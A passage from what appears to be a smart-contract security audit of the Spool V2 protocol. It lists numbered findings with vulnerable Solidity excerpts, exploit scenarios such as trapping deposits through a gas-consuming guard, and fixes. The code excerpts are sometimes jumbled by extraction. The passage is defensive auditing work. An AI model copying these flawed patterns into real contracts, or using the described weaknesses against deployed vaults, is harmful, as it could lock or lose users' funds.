++assetsToDeposit[dhwParams.assetGroup.length]; } } } [...] // - deposit assets into the protocol _depositToProtocol(dhwParams.assetGroup, assetsToDeposit, dhwParams.slippages); Figure 25.2: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L71–L75 Exploit Scenario The doHardWork function is called for a smart vault that uses the ConvexAlusdStrategy strategy; however, the subsequent call to _addLiquidity reverts due to the incorrect number of assets that it is trying to deposit. The smart vault is unusable. Recommendations Short term, have _addLiquidity loop the amounts array for N_COINS time instead of its length. Long term, refactor the Strategy.doHardWork function so that it does not use an additional element in the assetsToDeposit array to keep track of whether deposits need to be made. Instead, use a separate Boolean variable. The current pattern is too error-prone. 26. Reallocation process reverts when a ghost strategy is present Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SPL-26 Target: libraries/ReallocationLib.sol Description The reallocation process reverts in multiple places when a ghost strategy is present. As a result, it is impossible to reallocate a smart vault with a ghost strategy. The first revert would occur in the mapStrategies function (figure 26.1). Users calling the reallocate function would not know to add the ghost strategy address in the strategies array, which holds the strategies that need to be reallocated. This function reverts if it does not find a strategy in the array. Even if the ghost strategy address is in strategies , a revert would occur in the areas described below. function mapStrategies( address [] calldata smartVaults, address [] calldata strategies, mapping ( address => address []) storage _smartVaultStrategies ) private view returns ( uint256 [][] memory ) { [...] // Loop over smart vault's strategies. for ( uint256 j; j < smartVaultStrategiesLength; ++j) { address strategy = smartVaultStrategies[j]; bool found = false ; // Try to find the strategy in the provided list of strategies. for ( uint256 k; k < strategies.length; ++k) { if (strategies[k] == strategy) { // Match found. found = true ; strategyMatched[k] = true ; // Add entry to the strategy mapping. strategyMapping[i][j] = k; break ; } } if (!found) { list // If a smart vault's strategy was not found in the provided // of strategies, this means that the provided list is invalid. revert InvalidStrategies(); } } } Figure 26.1: A snippet of the mapStrategies function in spool-v2-core/ReallocationLib.sol#L86–L144 During the reallocation process, the doReallocation function calls the beforeRedeemalCheck and beforeDepositCheck functions even on ghost strategies (figure 26.2); however, their implementation is to revert on ghost strategies with an IsGhostStrategy error (figure 26.3) . function doReallocation( address [] calldata strategies, ReallocationParameterBag calldata reallocationParams, uint256 [][][] memory reallocationTable ) private { if (totals[0] == 0) { reallocationParams.withdrawalSlippages[i]); IStrategy(strategies[i]).beforeRedeemalCheck(0, // There is nothing to withdraw from strategy i. continue ; } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalUsdValue(); IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).beforeRedeemalCheck( sharesToDistribute, reallocationParams.withdrawalSlippages[i] ); [...] // Deposit assets into the underlying protocols. for ( uint256 i; i < strategies.length; ++i) { IStrategy(strategies[i]).beforeDepositCheck(toDeposit[i], reallocationParams.depositSlippages[i]); [...] Figure 26.2: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L 469 contract GhostStrategy is IERC20Upgradeable, IStrategy { [...] function beforeDepositCheck( uint256 [] memory , uint256 [] calldata ) external pure { revert IsGhostStrategy(); } function beforeRedeemalCheck( uint256 , uint256 [] calldata ) external pure { revert IsGhostStrategy(); } Figure 26.3: The beforeDepositCheck and beforeRedeemalCheck functions in spool-v2-core/GhostStrategy.sol#L98–L104 Exploit Scenario A strategy is removed from a smart vault. Bob, who has the ROLE_ALLOCATOR role, calls reallocate , but it reverts and the smart vault is impossible to reallocate. Recommendations Short term, modify the associated code so that ghost strategies are not passed to the reallocate function in the _smartVaultStrategies parameter. Long term, improve the system’s unit and integration tests to test for smart vaults with ghost strategies. Such tests are currently missing. 27. Broken test cases that hide security issues Severity: Informational Difficulty: Undetermined Type: Testing Finding ID: TOB-SPL-27 Target: test/RewardManager.t.sol , test/integration/RemoveStrategy.t.sol Description Multiple test cases do not check sufficient conditions to verify the correctness of the code, which could result in the deployment of buggy code in production and the loss of funds. The test_extendRewardEmission_ok test does not check the new reward rate and duration to verify the effect of the call to the extendRewardEmission function on the RewardManager contract: function test_extendRewardEmission_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount * 2, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount * 2); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration); vm.stopPrank(); } Figure 27.1: An insufficient test case for extendRewardEmission spool-v2-core/RewardManager.t.sol The test_removeReward_ok test does not check the new reward token count and the deletion of the reward configuration for the smart vault to verify the effect of the call to the removeReward function on the RewardManager contract: function test_removeReward_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); skip(rewardDuration + 1); rewardManager.removeReward(smartVault, rewardToken); vm.stopPrank(); } Figure 27.2: An insufficient test case for removeReward spool-v2-core/RewardManager.t.sol There is no test case to check the access controls of the removeReward function. Similarly, the test_forceRemoveReward_ok test does not check the effects of the forced removal of a reward token. Findings TOB-SPL-28 and TOB-SPL-29 were not detected by tests because of these broken test cases. The test_removeStrategy_betweenFlushAndDHW test does not check the balance of the master wallet. The test_removeStrategy_betweenFlushAndDhwWithdrawals test removes the strategy before the “do hard work” execution of the deposit cycle instead of removing it before the “do hard work” execution of the withdrawal cycle, making this test case redundant. Finding TOB-SPL-33 would have been detected if this test had been correctly implemented. There may be other broken tests that we did not find, as we could not cover all of the test cases. Exploit Scenario The Spool team deploys the protocol. After some time, the Spool team makes some changes in the code that introduces a bug that goes unnoticed due to the broken test cases. The team deploys the new changes with confidence in their tests and ends up introducing a security issue in the production deployment of the protocol. Recommendations Short term, fix the test cases described above. Long term, review all of the system’s test cases and make sure that they verify the given state change correctly and sufficiently after an interaction with the protocol. Use Necessist to find broken test cases and fix them. 28. Reward emission can be extended for a removed reward token Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-28 Target: rewards/RewardManager.sol Description Smart vault owners can extend the reward emission for a removed token, which may cause tokens to be stuck in the RewardManager contract. The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration: function _removeReward( address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for ( uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount- 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break ; } } } Figure 28.1: The _removeReward function in spool-v2-core/RewardManger.sol The extendRewardEmission function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is not zero to make sure that the token was already added to the smart vault: function extendRewardEmission( address smartVault, IERC20 token, uint256 reward, uint32 rewardsDuration) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardConfiguration[smartVault][token].tokenAdded == 0) { revert InvalidRewardToken(address(token)); } rewardConfiguration[smartVault][token].rewardsDuration = rewardsDuration; _extendRewardEmission(smartVault, token, reward); } Figure 28.2: The extendRewardEmission function in spool-v2-core/RewardManger.sol After removing a reward token from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which allows the smart vault owner to extend the reward emission for the removed token. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. After some time, she forgets that she removed token A from her vault. She calls extendRewardEmission with 1,000 token A as the reward. The amount of token A is transferred from Alice to the RewardManager contract, but it is not distributed to the users because it is not present in the list of reward tokens added for smart vault S. The 1,000 tokens are stuck in the RewardManager contract. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this. 29. A reward token cannot be added once it is removed from a smart vault Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-29 Target: rewards/RewardManager.sol Description Smart vault owners cannot add reward tokens again after they have been removed once from the smart vault, making owners incapable of providing incentives to users. The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration: function _removeReward( address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for ( uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount- 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break ; } } } Figure 29.1: The _removeReward function in spool-v2-core/RewardManger.sol The addToken function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is zero to make sure that the token was not already added to the smart vault: function addToken( address smartVault, IERC20 token, uint32 rewardsDuration, uint256 reward) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration[smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if (reward > 0) { _extendRewardEmission(smartVault, token, reward); } } Figure 29.2: The addToken function in spool-v2-core/RewardManger.sol After a reward token is removed from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which prevents the smart vault owner from adding the token again for reward distribution as an incentive to the users of the smart vault. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. Noticing the success of her earlier reward incentive program, she wants to add reward token A to her smart vault again, but her transaction to add the reward token reverts, leaving her with no choice but to distribute another token. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this. 30. Missing whenNotPaused modifier Severity: Low Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-30 Target: rewards/RewardPool.sol Description The documentation specifies which functionalities should not be working when the system is paused, including the claiming of rewards; however, the claim function does not have the whenNotPaused modifier. As a result, users can claim their rewards even when the system is paused. If the system is paused: - users can’t claim vault incentives - [...] Figure 30.1: A snippet of the provided Spool documentation function claim(ClaimRequest[] calldata data) public { Figure 30.2: The claim function header in spool-v2-core/RewardPool.sol#L47 Exploit Scenario Alice, who has the ROLE_PAUSER role in the system, pauses the protocol after she sees a possible vulnerability in the claim function. The Spool team believes there are no possible funds moving from the system; however, users can still claim their rewards. Recommendations Short term, add the whenNotPaused modifier to the claim function. Long term, improve the system’s unit and integration tests by adding a test to verify that the expected functionalities do not work when the system is in a paused state. 31. Users who deposit and then withdraw before doHardWork lose their tokens Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-31 Target: managers/DepositManager.sol Description Users who deposit and then withdraw assets before doHardWork is called will receive zero tokens from their withdrawal operations. When a user deposits assets, the depositAssets function mints an NFT with some metadata to the user who can later redeem it for the underlying SVT tokens. function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender) returns ( uint256 [] memory , uint256 ) { [...] // mint deposit NFT DepositMetadata memory metadata = DepositMetadata(bag.assets, block.timestamp , bag2.flushIndex); uint256 depositId = ISmartVault(bag.smartVault).mintDepositNFT(bag.receiver, metadata); [...] } Figure 31.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439 Users call the claimSmartVaultTokens function in the SmartVaultManager contract to claim SVT tokens. It is important to note that this function calls the _syncSmartVault function with false as the last argument, which means that it will not revert if the current flush index and the flush index to sync are the same. Then, claimSmartVaultTokens delegates the work to the corresponding function in the DepositManager contract. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts) public whenNotPaused returns ( uint256 ) { _onlyRegisteredSmartVault(smartVault); address [] memory tokens = _assetGroupRegistry.listAssetGroup(_smartVaultAssetGroups[smartVault]); _syncSmartVault(smartVault, _smartVaultStrategies[smartVault], tokens, false ); return _depositManager.claimSmartVaultTokens(smartVault, nftIds, nftAmounts, tokens, msg.sender ); } Figure 31.2: A snippet of the claimSmartVaultTokens function in spool-v2-core/SmartVaultManager.sol#L238–L247 Later, the claimSmartVaultTokens function in DepositManager (figure 31.3) computes the SVT tokens that users will receive by calling the getClaimedVaultTokensPreview function and passing the bag.mintedSVTs value for the flush corresponding to the burned NFT. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts, address [] calldata tokens, address executor ) external returns ( uint256 ) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender ); [...] ClaimTokensLocalBag memory bag; ISmartVault vault = ISmartVault(smartVault); bag.metadata = vault.burnNFTs(executor, nftIds, nftAmounts); for ( uint256 i; i < nftIds.length; ++i) { if (nftIds[i] > MAXIMAL_DEPOSIT_ID) { revert InvalidDepositNftId(nftIds[i]); } // we can pass empty strategy array and empty DHW index array, // because vault should already be synced and mintedVaultShares values available bag.data = abi.decode(bag.metadata[i], (DepositMetadata)); bag.mintedSVTs = _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares; claimedVaultTokens += getClaimedVaultTokensPreview(smartVault, bag.data, nftAmounts[i], bag.mintedSVTs , tokens); } Figure 31.3: A snippet of the claimSmartVaultTokens in spool-v2-core/DepositManager.sol#L135–L184 Then, getClaimedVaultTokensPreview calculates the SVT tokens proportional to the amount deposited. function getClaimedVaultTokensPreview( address smartVaultAddress, DepositMetadata memory data, uint256 nftShares, uint256 mintedSVTs, address [] calldata tokens ) public view returns ( uint256 ) { [...] for ( uint256 i; i < data.assets.length; ++i) { depositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], data.assets[i], exchangeRates[i]); totalDepositedUsd += totalDepositedAssets[i], exchangeRates[i]); _priceFeedManager.assetToUsdCustomPrice(tokens[i], } uint256 claimedVaultTokens = mintedSVTs * depositedUsd / totalDepositedUsd; return claimedVaultTokens * nftShares / NFT_MINTED_SHARES; } Figure 31.4: A snippet of the getClaimedVaultTokensPreview function in spool-v2-core/DepositManager.sol#L546–L572 However, the value of _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares , shown in figure 31.3, will always be 0 : the value is updated in the syncDeposit function, but because the current flush cycle is not finished yet, syncDeposit cannot be called through syncSmartVault . The same problem appears in the redeem , redeemFast , and claimWithdrawal functions. Exploit Scenario Bob deposits assets into a smart vault, but he notices that he deposited in the wrong smart vault. He calls redeem and claimWithdrawal , expecting to receive back his tokens, but he receives zero tokens. The tokens are locked in the smart contracts. Recommendations Short term, do not allow users to withdraw tokens when the corresponding flush has not yet happened. Long term, document and test the expected effects when calling functions in all of the possible orders, and add adequate constraints to avoid unexpected behavior. 32. Lack of events emitted for state-changing functions Severity: Informational Difficulty: Low Type: Auditing and Logging Finding ID: TOB-SPL-32 Target: src/ Description Multiple critical operations do not emit events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions. This may prevent malfunctioning contracts or attacks from being detected. The following operations should trigger events: ● SpoolAccessControl.grantSmartVaultOwnership ● ActionManager.setActions ● SmartVaultManager.registerSmartVault ● SmartVaultManager.removeStrategy ● SmartVaultManager.syncSmartVault ● SmartVaultManager.reallocate ● StrategyRegistry.registerStrategy ● StrategyRegistry.removeStrategy ● StrategyRegistry.doHardWork ● StrategyRegistry.setEcosystemFee ● StrategyRegistry.setEcosystemFeeReceiver ● StrategyRegistry.setTreasuryFee ● StrategyRegistry.setTreasuryFeeReceiver ● Strategy.doHardWork ● RewardManager.addToken ● RewardManager.extendRewardEmission Exploit Scenario The Spool system experiences a security incident, but the Spool team has trouble reconstructing the sequence of events causing the incident because of missing log information. Recommendations Short term, add events for all operations that may contribute to a higher level of monitoring and alerting. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. 33. Removal of a strategy could result in loss of funds Severity: Medium Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-33 Target: managers/SmartVaultManager.sol Description A Spool admin can remove a strategy from the system, which will be replaced by a ghost strategy in all smart vaults that use it; however, if a strategy is removed when the system is in specific states, funds to be deposited or withdrawn in the next “do hard work” cycle will be lost. If the following sequence of events occurs, the asset deposited will be lost from the removed strategy: 1. A user deposits assets into a smart vault. 2. The flush function is called. The StrategyRegistry._assetsDeposited[strategy][xxx][yyy] storage variable now has assets to send to the given strategy in the next “do hard work” cycle. 3. The strategy is removed. 4. doHardWork is called, but the assets for the removed strategy are locked in the master wallet because the function can be called only for valid strategies. If the following sequence of events occurs, the assets withdrawn from a removed strategy will be lost: 1. doHardWork is called. 2. The strategy is removed before a smart vault sync is done. Exploit Scenario Multiple smart vaults use strategy A. Users deposited a total of $1 million, and $300,000 should go to strategy A. Strategy A is removed due to an issue in the third-party protocol. All of the $300,000 is locked in the master wallet. Recommendations Short term, modify the associated code to properly handle deposited and withdrawn funds when strategies are removed. Long term, improve the system’s unit and integration tests: consider all of the possible transaction sequences in the system’s state and test them to ensure their correct behavior. 34. ExponentialAllocationProvider reverts on strategies without risk scores Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-34 Target: providers/ExponentialAllocationProvider.sol Description The ExponentialAllocationProvider.calculateAllocation function can revert due to division-by-zero error when a strategy’s risk score has not been set by the risk provider. The risk variable in calculateAllocation represents the risk score set by the risk provider for the given strategy, represented by the index i . Ghost strategies can be passed to the function. If a ghost strategy’s risk score has not been set (which is likely, as there would be no reason to set one), the function will revert with a division-by-zero error. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { if (data.apys.length != data.riskScores.length) { revert ApysOrRiskScoresLengthMismatch(data.apys.length, data.riskScores.length); } [...] for ( uint8 i; i < data.apys.length; ++i) { [...] int256 risk = fromUint(data.riskScores[i]); results[i] = uint256 ( div(apy, risk) ); resultSum += results[i]; } Figure 34.1: A snippet of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L309–L340 Exploit Scenario A strategy is removed from a smart vault that uses the ExponentialAllocationProvider contract. Bob, who has the ROLE_ALLOCATOR role, calls reallocate ; however, it reverts, and the smart vault is impossible to reallocate. Recommendations Short term, modify the calculateAllocation function so that it properly handles strategies with uninitialized risk scores. Long term, improve the unit and integration tests for the allocators. Refactor the codebase so that ghost strategies are not passed to the calculateAllocator function. 35. Removing a strategy makes the smart vault unusable Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-35 Target: managers/DepositManager.sol Description Removing a strategy from a smart vault causes every subsequent deposit transaction to revert, making the smart vault unusable. The deposit function of the SmartVaultManager contract calls the depositAssets function on the DepositManager contract. The depositAssets function calls the checkDepositRatio function, which takes an argument called strategyRatios : function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns ( uint256 [] memory , uint256 ) { ... // check if assets are in correct ratio checkDepositRatio( bag.assets, SpoolUtils.getExchangeRates(bag2.tokens, _priceFeedManager), bag2.allocations, SpoolUtils.getStrategyRatiosAtLastDhw(bag2.strategies, _strategyRegistry) ); ... return (_vaultDeposits[bag.smartVault][bag2.flushIndex].toArray(bag2.tokens.length), depositId); } Figure 35.1: The depositAssets function in spool-v2-core/DepositManager.sol The value of strategyRatios is fetched from the StrategyRegistry contract, which returns an empty array on ghost strategies. This empty array is then used in a for loop in the calculateFlushFactors function: function calculateFlushFactors( uint256 [] memory exchangeRates, uint16a16 allocation, uint256 [][] memory strategyRatios ) public pure returns ( uint256 [][] memory ) { uint256 [][] memory flushFactors = new uint256 [][](strategyRatios.length); // loop over strategies for ( uint256 i; i < strategyRatios.length; ++i) { flushFactors[i] = new uint256 [](exchangeRates.length); uint256 normalization = 0; // loop over assets for ( uint256 j = 0; j < exchangeRates.length; j++) { normalization += strategyRatios[i][j] * exchangeRates[j]; } // loop over assets for ( uint256 j = 0; j < exchangeRates.length; j++) { flushFactors[i][j] = allocation.get(i) * strategyRatios[i][j] * PRECISION_MULTIPLIER / normalization; } } return flushFactors; } Figure 35.2: The calculateFlushFactors function in spool-v2-core/DepositManager.sol The statement calculating the value of normalization tries to access an index of the empty array and reverts with the Index out of bounds error, causing the deposit function to revert for every transaction thereafter. Exploit Scenario A Spool admin removes a strategy from a smart vault. Because of the presence of a ghost strategy, users’ deposit transactions into the smart vault revert with the Index out of bounds error. Recommendations Short term, modify the calculateFlushFactors function so that it skips ghost strategies in the loop used to calculate the value of normalization . Long term, review the entire codebase, check the effects of removing strategies from smart vaults, and ensure that all of the functionality works for smart vaults with one or more ghost strategies. 36. Issues with the management of access control roles in deployment script Severity: Low Difficulty: Low Type: Access Controls Finding ID: TOB-SPL-36 Target: script/DeploySpool.s.sol Description The deployment script does not properly manage or assign access control roles. As a result, the protocol will not work as expected, and the protocol’s contracts cannot be upgraded. The deployment script has multiple issues regarding the assignment or transfer of access control roles. It fails to grant certain roles and to revoke temporary roles on deployment: ● ● ● ● ● Ownership of the ProxyAdmin contract is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, making the smart contracts non-upgradeable. The DEFAULT_ADMIN_ROLE role is not transferred to an EOA, multisig wallet, or DAO after the system is deployed, leaving no way to manage roles after deployment. The ADMIN_ROLE_STRATEGY role is not assigned to the StrategyRegistry contract, which is required to grant the ROLE_STRATEGY role to a strategy contract. Because of this, new strategies cannot be registered. The ADMIN_ROLE_SMART_VAULT_ALLOW_REDEEM role is not assigned to the SmartVaultFactory contract, which is required to grant the ROLE_SMART_VAULT_ALLOW_REDEEM role to smartVault contracts. The ROLE_SMART_VAULT_MANAGER and ROLE_MASTER_WALLET_MANAGER roles are not assigned to the DepositManager and WithdrawalManager contracts, making them unable to move funds from the master wallet contract. We also found that the ROLE_SMART_VAULT_ADMIN role is not assigned to the smart vault owner when a new smart vault is created. This means that smart vault owners will not be able to manage their smart vaults. Exploit Scenario The Spool team deploys the smart contracts using the deployment script, but due to the issues described in this finding, the team is not able to perform the role management and upgrades when required. Recommendations Short term, modify the deployment script so that it does the following on deployment: ● ● ● ● Transfers ownership of the proxyAdmin contract to an EOA, multisig wallet, or DAO Transfers the DEFAULT_ADMIN_ROLE role to an EOA, multisig wallet, or DAO Grants the required roles to the smart contracts Allow the SmartVaultFactory contract to grant the ROLE_SMART_VAULT_ADMIN role to owners of newly created smart vaults Long term, document all of the system’s roles and interactions between components that require privileged roles. Make sure that all of the components are granted their required roles following the principle of least privilege to keep the protocol secure and functioning as expected. 37. Risk of DoS due to unbounded loops Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-37 Target: managers/SmartVaultManager.sol Description Guards and actions are run in unbounded loops. A smart vault creator can add too many guards and actions, potentially trapping the deposit and withdrawal functionality due to a lack of gas. The runGuards function calls all the configured guard contracts in a loop: function runGuards( address smartVaultId, RequestContext calldata context) external view { if (guardPointer[smartVaultId][context.requestType] == address (0)) { return ; } GuardDefinition[] memory guards = _readGuards(smartVaultId, context.requestType); for ( uint256 i; i < guards.length; ++i) { GuardDefinition memory guard = guards[i]; bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context); ( bool success, bytes memory data) = guard.contractAddress.staticcall(encoded); _checkResult(success, data, guard.operator, guard.expectedValue, i); } } Figure 37.1: The runGuards function in spool-v2-core/GuardManager.sol Multiple conditions can cause this loop to run out of gas: ● ● ● The vault creator adds too many guards. One of the guard contracts consumes a high amount of gas. A guard starts consuming a high amount of gas after a specific block or at a specific state. If user transactions reach out-of-gas errors due to these conditions, smart vaults can become unusable, and funds can become stuck in the protocol. A similar issue affects the runActions function in the AuctionManager contract. Exploit Scenario Eve creates a smart vault with an upgradeable guard contract. Later, when users have made large deposits, Eve upgrades the guard contract to consume all of the available gas to trap user deposits in the smart vault for as long as she wants. Recommendations Short term, model all of the system's variable-length loops, including the ones used by runGuards and runActions , to ensure they cannot block contract execution within expected system parameters. Long term, carefully audit operations that consume a large amount of gas, especially those in loops. 38. Unsafe casts throughout the codebase Severity: Undetermined Difficulty: Undetermined Type: Data Validation Finding ID: TOB-SPL-38 Target: src/ Description The codebase contains unsafe casts that could cause mathematical errors if they are reachable in certain states. Examples of possible unsafe casts are shown in figures 38.1 and 38.2. function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { [...] _flushShares[smartVault][flushIndex].flushSvtSupply = uint128(ISmartVault(smartVault).totalSupply()) ; return _strategyRegistry.addDeposits(strategies, distribution); } Figure 38.1: A possible unsafe cast in spool-v2-core/DepositManager.sol#L220 function syncDeposits( address smartVault, uint256 [3] calldata bag, // uint256 flushIndex, // uint256 lastDhwSyncedTimestamp, // uint256 oldTotalSVTs, address [] calldata strategies, uint16a16[2] calldata dhwIndexes, address [] calldata assetGroup, SmartVaultFees calldata fees ) external returns (DepositSyncResult memory ) { [...] if (syncResult.mintedSVTs > 0) { _flushShares[smartVault][bag[0]].mintedVaultShares = uint128 (syncResult.mintedSVTs) ; [...] } return syncResult; } Figure 38.2: A possible unsafe cast in spool-v2-core/DepositManager.sol#L243 Recommendations Short term, review the codebase to identify all of the casts that may be unsafe. Analyze whether these casts could be a problem in the current codebase and, if they are unsafe, make the necessary changes to make them safe. Long term, when implementing potentially unsafe casts, always include comments to explain why those casts are safe in the context of the codebase. +6. Incorrect handling of fromVaultsOnly in removeStrategy Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-6 Target: managers/SmartVaultManager.sol Description The removeStrategy function allows Spool admins to remove a strategy from the smart vaults using it. Admins are also able to remove the strategy from the StrategyRegistry contract, but only if the value of fromVaultsOnly is false ; however, the implementation enforces the opposite, as shown in figure 6.1. function removeStrategy( address strategy, bool fromVaultsOnly) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); _checkRole(ROLE_STRATEGY, strategy); ... if ( fromVaultsOnly ) { _strategyRegistry.removeStrategy(strategy); } } Figure 6.1: The removeStrategy function in spool-v2-core/SmartVaultManager.sol#L298–L317 Exploit Scenario Bob, a Spool admin, calls removeStrategy with fromVaultsOnly set to true , believing that this call will not remove the strategy from the StrategyRegistry contract. However, once the transaction is executed, he discovers that the strategy was indeed removed. Recommendations Short term, replace if (fromVaultsOnly) with if (!fromVaultsOnly) in the removeStrategy function to implement the expected behavior. Long term, improve the system’s unit and integration tests to catch issues such as this one. +7. Risk of LinearAllocationProvider and ExponentialAllocationProvider reverts due to division by zero Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-7 Target: providers/LinearAllocationProvider.sol , providers/ExponentialAllocationProvider.sol Description The LinearAllocationProvider and ExponentialAllocationProvider contracts’ calculateAllocation function can revert due to a division-by-zero error: LinearAllocationProvider ’s function reverts when the sum of the strategies’ APY values is 0 , and ExponentialAllocationProvider ’s function reverts when a single strategy has an APY value of 0 . Figure 7.1 shows a snippet of the LinearAllocationProvider contract’s calculateAllocation function; if the apySum variable, which is the sum of all the strategies’ APY values, is 0 , a division-by-zero error will occur. uint8 [] memory arrayRiskScores = data.riskScores; for ( uint8 i; i < data.apys.length; ++i) { apySum += (data.apys[i] > 0 ? uint256 (data.apys[i]) : 0); riskSum += arrayRiskScores[i]; } uint8 riskt = uint8 (data.riskTolerance + 10); // from 0 to 20 for ( uint8 i; i < data.apys.length; ++i) { uint256 apy = data.apys[i] > 0 ? uint256 (data.apys[i]) : 0; apy = (apy * FULL_PERCENT) / apySum ; Figure 7.1: Part of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L39–L49 Figure 7.2 shows that for the ExponentialAllocationProvider contract’s calculateAllocation function, if the call to log_2 occurs with partApy set to 0 , the function will revert because of log_2 ’s require statement shown in figure 7.3. for ( uint8 i; i < data.apys.length; ++i) { uint256 uintApy = (data.apys[i] > 0 ? uint256 (data.apys[i]) : 0); int256 partRiskTolerance = fromUint( uint256 (riskArray[ uint8 (20 - riskt)])); partRiskTolerance = div(partRiskTolerance, _100); int256 partApy = fromUint(uintApy); partApy = div(partApy, _100); int256 apy = exp_2(mul(partRiskTolerance, log_2(partApy) )); Figure 7.2: Part of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L323–L331 function log_2( int256 x) internal pure returns ( int256 ) { unchecked { require (x > 0); Figure 7.3: Part of the log_2 function in spool-v2-core/ExponentialAllocationProvider.sol#L32–L34 Exploit Scenario Bob deploys a smart vault with two strategies using the ExponentialAllocationProvider contract. At some point, one of the strategies has 0 APY, causing the transaction call to reallocate the assets to unexpectedly revert. Recommendations Short term, modify both versions of the calculateAllocation function so that they correctly handle cases in which a strategy’s APY is 0 . Long term, improve the system’s unit and integration tests to ensure that the basic operations work as expected. +8. Strategy APYs are never updated Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-8 Target: managers/StrategyRegistry.sol Description The _updateDhwYieldAndApy function is never called. As a result, each strategy’s APY will constantly be set to 0 . function _updateDhwYieldAndApy( address strategy, uint256 dhwIndex, int256 yieldPercentage) internal { if (dhwIndex > 1) { unchecked { _stateAtDhw[address(strategy)][dhwIndex - 1].timestamp); int256 timeDelta = int256 (block.timestamp - if (timeDelta > 0) { timeDelta; int256 normalizedApy = yieldPercentage 